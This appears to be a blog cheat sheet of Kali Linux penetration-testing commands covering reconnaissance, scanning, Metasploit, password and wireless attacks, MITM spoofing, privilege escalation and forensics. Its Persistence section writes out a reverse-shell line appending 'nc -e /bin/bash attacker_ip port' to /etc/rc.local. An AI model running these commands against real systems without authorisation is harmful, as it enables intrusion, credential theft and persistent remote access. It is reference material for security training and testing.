Kali Linux Command Cheat Sheet

Kali Linux Command Cheat Sheet

The ultimate reference guide for penetration testing tools and commands

Table of Contents

Introduction to Kali Linux

Kali Linux is a Debian-based Linux distribution designed for digital forensics and penetration testing. It is maintained and funded by Offensive Security and comes pre-installed with numerous security tools.

Basic System Information

uname -a
Display system information including kernel version
cat /etc/os-release
Show Kali Linux version information
df -h
Check disk space usage
free -m
Display memory usage

Package Management

sudo apt update && sudo apt upgrade
Update package lists and upgrade packages
sudo apt install package_name
Install a new package
sudo apt remove package_name
Remove a package
sudo apt list –installed | grep keyword
Search for installed packages

System Commands

File System Navigation

ls -la
List all files with details
find / -name filename 2>/dev/null
Find files by name, hiding error messages
locate filename
Quickly locate files using database
updatedb
Update the locate database

User Management

sudo useradd -m username
Create a new user with home directory
sudo passwd username
Set or change password for a user
sudo usermod -aG sudo username
Add user to sudo group
id
Display current user ID and groups

Process Management

ps aux
Display all running processes
kill PID
Kill a process by its PID
killall process_name
Kill all processes with the given name
top
Display and manage running processes

Network Commands & Utilities

Network Configuration

ifconfig
Display network interfaces and IP addresses
ip a
Modern alternative to ifconfig
iwconfig
Display wireless network interfaces
route -n
Display routing table

Network Troubleshooting

ping target
Test connectivity to a host
traceroute target
Trace route to a host
mtr target
Combines ping and traceroute for network diagnostics
netstat -tuln
Show listening ports and established connections

Information Gathering

DNS Reconnaissance

host domain.com
Perform DNS lookup
dig domain.com any
Detailed DNS lookup with all records
dnsenum domain.com
Enumerate DNS information
dnsrecon -d domain.com
DNS reconnaissance tool

Subdomain Enumeration

sublist3r -d domain.com
Fast subdomain enumeration tool
amass enum -d domain.com
In-depth attack surface mapping tool
gobuster dns -d domain.com -w /usr/share/wordlists/dirb/common.txt
Brute force DNS subdomains
fierce –domain domain.com
DNS reconnaissance tool

WHOIS & IP Information

whois domain.com
Query WHOIS information for a domain
whois IP_address
Query WHOIS information for an IP address
theHarvester -d domain.com -b all
Gather emails, subdomains, hosts, etc.
recon-ng
Full-featured reconnaissance framework

Vulnerability Scanning

Port Scanning with Nmap

nmap -sS target
SYN scan (default, stealthy)
nmap -sV -sC target
Service version detection + default scripts
nmap -p- target
Scan all 65535 ports
nmap -A target
Aggressive scan (OS detection, version detection, script scanning, and traceroute)
nmap -sU target
UDP port scan
nmap –script vuln target
Scan for vulnerabilities
masscan -p1-65535 target –rate=1000
Fast port scanner
unicornscan target:1-65535
Flexible and efficient port scanner

Vulnerability Scanners

nikto -h target
Web server scanner
openvas-setup
Set up OpenVAS vulnerability scanner
searchsploit keyword
Search for exploits in Exploit-DB
wpscan –url http://example.com –enumerate u
WordPress vulnerability scanner

Exploitation Tools

Metasploit Framework

msfconsole
Start Metasploit console
search exploit_name
Search for exploits in Metasploit
use exploit_path
Select an exploit to use
show options
Display options for the selected exploit

Exploitation Examples

exploit
Run the selected exploit
sessions -l
List active sessions
sessions -i session_id
Interact with a specific session
background
Background the current session

Other Exploitation Tools

sqlmap -u http://example.com/page?id=1
Automated SQL injection tool
hydra -l username -P wordlist.txt service://target
Brute force login tool
john –wordlist=wordlist.txt hashfile
Password cracking tool
burpsuite
Web application security testing tool

Web Application Tools

Web Vulnerability Scanning

nikto -h http://example.com
Web server vulnerability scanner
wpscan –url http://example.com –enumerate u
WordPress vulnerability scanner
dirb http://example.com /usr/share/wordlists/dirb/common.txt
Web directory brute force tool
gobuster dir -u http://example.com -w /usr/share/wordlists/dirb/common.txt
Fast directory brute force tool

Web Exploitation

sqlmap -u http://example.com/page?id=1
Automated SQL injection tool
xsser -u http://example.com
Automated XSS testing tool
commix -u http://example.com/page.php?id=1
Automated command injection tool
burpsuite
Web application security testing tool

Password Attacks

Password Cracking

john –wordlist=wordlist.txt hashfile
Password cracking tool
hashcat -m hash_type -a attack_mode hashfile wordlist.txt
Advanced password recovery tool
hydra -l username -P wordlist.txt service://target
Brute force login tool
crunch min_length max_length charset -o wordlist.txt
Wordlist generator

Wireless Attacks

Wireless Reconnaissance

airodump-ng interface
Capture wireless packets
wash -i interface
Detect WPS-enabled networks
kismet
Wireless network detector
wifite
Automated wireless attack tool

Wireless Exploitation

aireplay-ng –deauth count -a BSSID -c client interface
Deauthentication attack
reaver -i interface -b BSSID
WPS PIN brute force attack
bully interface -b BSSID
WPS PIN brute force attack
fern-wifi-cracker
GUI-based wireless attack tool

Sniffing & Spoofing

Packet Sniffing

tcpdump -i interface
Capture network traffic
wireshark
GUI-based packet analyzer
tshark -i interface
Command-line packet analyzer
ettercap -T -i interface
Network sniffing and MITM tool

Spoofing & MITM

arpspoof -i interface -t target -r gateway
ARP spoofing tool
mitmproxy
Interactive TLS-capable intercepting proxy
bettercap -iface interface
Swiss army knife for network attacks
driftnet -i interface
Capture and display images from network traffic

Post Exploitation

Privilege Escalation

sudo -l
List available sudo privileges
find / -perm -u=s -o -perm -g=s 2>/dev/null
Find SUID/SGID files
linpeas.sh
Linux privilege escalation script
unix-privesc-check
Unix privilege escalation checker

Persistence

crontab -e
Edit cron jobs for persistence
echo “nc -e /bin/bash attacker_ip port” >> /etc/rc.local
Add reverse shell to rc.local
ssh-keygen -t rsa
Generate SSH keys for persistence
chkconfig –add service
Add a service for persistence

Digital Forensics

File Analysis

strings file
Extract strings from a binary file
binwalk file
Analyze and extract firmware images
foremost -i file
File carving tool
volatility -f memory_dump imageinfo
Analyze memory dumps

Disk Analysis

fdisk -l
List disk partitions
dd if=/dev/sda of=image.img
Create a disk image
testdisk
Partition recovery tool
photorec
File recovery tool

Reporting Tools

Report Generation

dradis
Collaborative reporting tool
faraday
Collaborative pentest platform
magictree
Penetration test data organizer
serpico
Report generation tool

Social Engineering

Social Engineering Toolkit (SET)

setoolkit
Launch the Social Engineering Toolkit
setoolkit –update
Update the Social Engineering Toolkit
setoolkit –config
Configure the Social Engineering Toolkit
setoolkit –help
Show SET help menu

Anonymity Tools

Tor & Proxychains

service tor start
Start Tor service
proxychains command
Run a command through proxychains
torsocks command
Run a command through Tor
macchanger -r interface
Randomize MAC address

Bash Scripting for Pentesters

Basic Scripting

#!/bin/bash
Shebang for bash scripts
echo “Hello, World!”
Print text to the terminal
read -p “Enter input: ” variable
Read user input into a variable
if [ condition ]; then command; fi
Basic if statement

Advanced Scripting

for i in {1..10}; do command; done
For loop example
while [ condition ]; do command; done
While loop example
case variable in pattern1) command1;; pattern2) command2;; esac
Case statement example
function name() { commands; }
Function definition

© 2025 cybersamir Cheat Sheet. All rights reserved.

↑
Avatar photo

I'm passionate about technology, coding. I've been interested in computers since I was a kid. My favorite programming languages are python and JavaScript

Similar Posts

Beginner’s Guide to Installing Kali Linux in 2025

Beginner’s Guide to Installing Kali Linux in 2025

BySamir KC

If you’re new to the world of ethical hacking or cybersecurity, Kali Linux is one…

Leave a Reply

Your email address will not be published. Required fields are marked *